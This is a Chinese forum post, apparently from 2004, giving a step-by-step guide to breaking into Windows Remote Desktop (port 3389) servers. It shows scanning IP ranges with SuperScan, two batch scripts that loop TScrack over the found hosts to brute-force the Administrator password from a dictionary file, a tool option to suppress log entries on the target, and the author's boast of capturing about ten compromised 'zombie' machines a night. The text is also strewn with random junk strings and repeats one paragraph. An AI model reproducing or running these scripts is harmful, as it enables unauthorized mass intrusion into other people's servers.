QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2694|回复: 0
打印 上一主题 下一主题

终端服务真正的另类入侵

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 09:51 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

作者:霜风 QQ:14226581

' X) E% F; v6 m# ]5 B

终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。 . t: G( A5 L: }" t! X这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: . c4 `" y8 c! t: p9 A6 p( B5 b 首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下: 2 u- C2 b& k$ i! e0 U先打开superscan3如图1& A* ^4 g/ N8 [ ]3 d 7 I. ]1 s: O" Z" ^& R9 ~ 此主题相关图片如下:. y% P8 d# O5 P0 ]

9 y C5 k2 ~/ M F8 e' n

0 R; o2 E. H5 H 接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2 - y$ S. V7 U. C V2 k( X$ I9 `# b' n; b. D# k5 Q4 h 此主题相关图片如下: 4 {; L/ A \& _% K# _5 q- ~ m* r3 Y) ~' s5 A& `6 ?3 S

0 t) o) X. E) Q: c) w: f( u' x

然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.$ W* f& ~2 H- z4 ?8 i 这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图32 Q2 @' \5 k, i3 `+ p% ]( | ; H5 c9 u* b( k. A此主题相关图片如下:: x$ S, O0 S; i: o/ H3 H

6 } B% w3 [ z" w3 H- t6 L

* k. N& E7 R/ X# _“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。 ( X' u5 h! C1 J) T5 M$ c+ P; [+ X) f9 Q l/ X( x 此主题相关图片如下:/ i/ |& ~* G7 |4 C$ x

* h, y; F t E" @1 u2 u- j

接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5$ z; i2 w6 g' V2 Z* R5 B 3 Y! Q6 y: r7 D+ ? o& a7 p 此主题相关图片如下:5 j( N/ B. k" T

- ^9 p0 y T. g7 Y, i# F% d. }* b

进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。) s/ d% J5 Y: I! _% a 所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。 7 P3 Z+ |. ?/ U% X$ T d: g/ n2 ]TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。: d r1 P3 f' {0 e 此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。 : t% J9 M. x {% V在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项: [4 [( E0 F* b$ A -h : Print usage help and exit5 y+ D" h: ^9 n# k6 M p, a9 F -V : Print version info and exit" W& F9 P1 N; G( c9 n7 X -s : Print chipher strenght info and exit0 q& V7 @7 E4 U -b : Enable failed password beep + |) ~# Q: Y8 ?! Y-t : Use two simultaneous connections [EXPERIMENTAL]) m$ P: E. Q# N' {4 f -N : Prevent System Log entries on targeted server $ e- h+ K4 Q4 O: L" X, ]-U : Uninstall tscrack and remove components! W u( @- H |( g6 U2 S+ N/ N$ H2 D -f <number> : Wordlist entry to start cracking with 4 | M4 \ s% o1 `- H-F <delay> : Sampling Frequency (Delay between samples in ms) : ?9 A0 w! D1 L& n* ~0 o8 d-l <user> : Account name to use, defaults to Administrator $ w- q. C9 E. C* M# n, N* o6 @-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted & Q. Z4 U g$ a4 d+ Y/ E-p <password> : Use <password> to logon instead of wordlist/blank pass ) p% [' G2 l# y* D4 T9 ]-D <domain> : Specify domain to attempt logon to

5 h" o# o$ R1 o. h% Z1 `( H" B4 F; Y4 Y/ L! f3 y3 b 2 k# }% {/ z! o2 s% Q" K7 Q3 t/ `$ \ 我就帮忙翻译一下吧,翻译得不好可不要怪我啊:/ D9 z+ m3 O* D3 m! F -h : 显示使用帮助然后退出 : `) B5 d1 P1 K4 b% W-V : 显示版本信息然后退出 " R4 E3 W! e' j* ?5 m- N0 t-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明) P9 o3 o* x9 q# d2 P4 \( H -b : 密码错误时发出声音 , O: ^) B7 Q& w) N$ V/ G6 l-t : 同时发出多个连接,就是多线程。" ?! v* ?$ ^8 L, E$ U& g -N : Prevent System Log entries on targeted server 5 M, C( ]) B8 h7 p9 @-U : 卸载移除tscrack组件。" I1 N+ a' B x: L; s6 K/ M& F -f <number> : 使用-F后面的密码。3 J" i1 R+ K8 S, d+ q5 \9 ?/ q+ R& J -F <delay> : 间隔时间(频率) 2 ?- ~1 F5 i: G# _-l <user> : 使用-L后面的用户名7 L- M' g9 V& m3 m! `2 E" d1 v' @ -w <wordlist> : 使用-W后面的字典 % R: X0 j& x4 W( ^- t-p <password> : 使用-W后的密码 : n- B) C( U/ `% c) g1 \5 y* X-D <domain> : 登陆主页面?

2 g- A p. p8 V8 b相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本: 7 v6 i3 E" \. t" Z, j@if not exist IpcScan.txt goto noscan 5 l, K2 Z7 x" V( ^9 B@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i / m7 e% k! z6 h7 \$ H0 I- ^, q:noscan 2 q( E% R* H% y, f6 H4 Q& L' ~@echo 3389.txt no find or scan faild

) P% Z6 D$ N4 E这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)

2 g" v9 m8 p. ^% ~. @3 U% Y 保存后把后错名改为BAT就可以了。 $ n6 b9 c, H6 P4 i还写一个BAT,名字为HACK.BAT,代码如下:

( \ \8 m& M* K) a0 \ @if not exist tscrack.exe goto noscan / N& d3 l7 f# H3 M/ ]@tscrack %1 -l administartor -w pass.dic >>rouji.txt% O1 V8 a6 a1 W3 Y: t% D :noscan * R ~# o7 f* u@echo tscrack.exe no find or scan faild

; i4 x% b8 z3 I4 }这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC + o+ A3 \; l( G) K) Y5 |3 g制作方法如上。6 E5 j) J4 s: E" x8 s/ H1 w; h 然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6 ' Y* i$ p0 d+ E6 O& G8 l. C6 s% A2 q+ o, D 此主题相关图片如下:) d& S0 m9 _8 Y$ K

怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.- P# K3 F$ F" r/ D 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7 # Q2 c7 I& Z8 W7 T' Z6 a9 T2 q% B Q! y: A; n 此主题相关图片如下: $ P8 Z& b$ l$ I" u, V* F' r Q( y5 e5 ?, [7 W& t 怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.9 f, }" e( z9 f+ Z# y0 S$ F 最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-8-30 20:05 , Processed in 0.857306 second(s), 52 queries .

回顶部